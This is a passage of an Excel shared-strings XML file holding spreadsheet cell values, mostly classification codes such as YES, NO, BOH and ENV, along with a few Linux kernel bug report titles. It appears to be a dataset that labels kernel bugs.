    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Some times I get error hdb: status error: status=0x58 { DriveReady SeekComplete DataRequest } while booting, system is then unstable</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Reboot instead of powerdown with 2.6.20-rc4 or 2.6.20-rc5</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Keyboard LEDs don't reflect state when a keyboard is connected.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ufs (ufstype=ufs2) oops on unmount</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Using cryptoloop: soft lockup detected but system still reacts (false positive?)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>suspend freezes kernel clock</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ACPI-related freeze on Intel PM965 - Samsung X65 (x86_64)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
